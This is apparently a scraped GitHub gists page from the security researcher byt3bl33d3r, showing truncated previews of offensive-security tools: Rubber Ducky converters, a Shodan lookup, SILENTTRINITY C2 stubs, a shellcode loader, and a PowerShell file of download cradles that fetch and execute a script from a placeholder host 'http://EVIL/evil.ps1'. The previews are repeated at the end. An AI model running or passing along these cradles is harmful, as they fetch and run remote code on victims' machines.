Marcello byt3bl33d3r

## ducky-convert.py
#! /usr/bin/env python

from configobj import ConfigObj
import sys
import StringIO
import re
from pprint import pprint

if len(sys.argv) < 3:
	print 'Usage: ducky-convert.py <keyboard.properties> <layout.properties>'

## duckhunter.py
#! /usr/bin/env python
import sys
import re
import os
from decimal import Decimal #for conversion milliseconds -> seconds

if len(sys.argv) < 2:
	print 'Usage: duck-hunter.py <duckyscript> output.txt'
	#print 'Usage: duck-hunter.py <duckyscript> <language> output.txt'

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                byt3bl33d3r
                / keybase.md
            
            
              Created
              April 12, 2015 10:33
            
              
                keybase.md
              
          
    Keybase proof

I hereby claim:

I am byt3bl33d3r on github.
I am byt3bl33d3r (https://keybase.io/byt3bl33d3r) on keybase.
I have a public key whose fingerprint is F875 2C5D DC1B 9EB1 9073  C30D A2A9 C1F5 F948 B62B

To claim this, I am signing this object:

  
## CVE2Java.py
#! /usr/bin/env python2

import requests
import lxml.html
import sys

r = requests.get(sys.argv[1])
tree = lxml.html.fromstring(r.text)

try:

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                byt3bl33d3r
                / keybase.md
            
            
              Created
              June 18, 2015 03:20
            
              
                Keybase proof
              
          
    Keybase proof

I hereby claim:

I am byt3bl33d3r on github.
I am byt3bl33d3r (https://keybase.io/byt3bl33d3r) on keybase.
I have a public key whose fingerprint is 7069 4855 F807 0C99 9731  C777 60FA BDD3 A6E1 5E81

To claim this, I am signing this object:

  
## shodan_getuphosts.py
import shodan
import sys
from shodan import APIError
from netaddr import IPNetwork

SHODAN_API_KEY= 'APIKEY'

api = shodan.Shodan(SHODAN_API_KEY)

targets = map(IPNetwork, sys.argv[1].split(','))

## SILENTTRINITY.cs
using System;
using IronPython.Hosting;
using IronPython.Modules;
//using IronPython.Runtime;
using System.IO;
using System.Linq;
using System.Reflection;
using Microsoft.Scripting.Hosting;
using Microsoft.Scripting.Utils;
using System.Collections.Generic;

## ecdh_eke.py
from System.IO import MemoryStream
from System.Text import Encoding
from System.Security.Cryptography import Aes, AsymmetricAlgorithm, CryptoStream, CryptoStreamMode


class DiffieHellman:
    def __init__(self):
        self.aes = Aes.Create()
        self.diffieHellman = AsymmetricAlgorithm.Create("ECDiffieHellmanCng")
        self.PublicKey = self.diffieHellman.PublicKey.ToByteArray()

## shellcode.boo
import System.Runtime.InteropServices
from System import IntPtr

[DllImport("kernel32.dll")]
def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as int, flProtect as int) as int:
    pass

[DllImport("kernel32.dll")]
def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
    pass

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
	#! /usr/bin/env python

	from configobj import ConfigObj
	import sys
	import StringIO
	import re
	from pprint import pprint

	if len(sys.argv) < 3:
	print 'Usage: ducky-convert.py <keyboard.properties> <layout.properties>'
	#! /usr/bin/env python2

	import requests
	import lxml.html
	import sys

	r = requests.get(sys.argv[1])
	tree = lxml.html.fromstring(r.text)

	try:
	import shodan
	import sys
	from shodan import APIError
	from netaddr import IPNetwork

	SHODAN_API_KEY= 'APIKEY'

	api = shodan.Shodan(SHODAN_API_KEY)

	targets = map(IPNetwork, sys.argv[1].split(','))
	using System;
	using IronPython.Hosting;
	using IronPython.Modules;
	//using IronPython.Runtime;
	using System.IO;
	using System.Linq;
	using System.Reflection;
	using Microsoft.Scripting.Hosting;
	using Microsoft.Scripting.Utils;
	using System.Collections.Generic;
	from System.IO import MemoryStream
	from System.Text import Encoding
	from System.Security.Cryptography import Aes, AsymmetricAlgorithm, CryptoStream, CryptoStreamMode


	class DiffieHellman:
	def __init__(self):
	self.aes = Aes.Create()
	self.diffieHellman = AsymmetricAlgorithm.Create("ECDiffieHellmanCng")
	self.PublicKey = self.diffieHellman.PublicKey.ToByteArray()
	import System.Runtime.InteropServices
	from System import IntPtr

	[DllImport("kernel32.dll")]
	def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as int, flProtect as int) as int:
	pass

	[DllImport("kernel32.dll")]
	def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
	pass
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object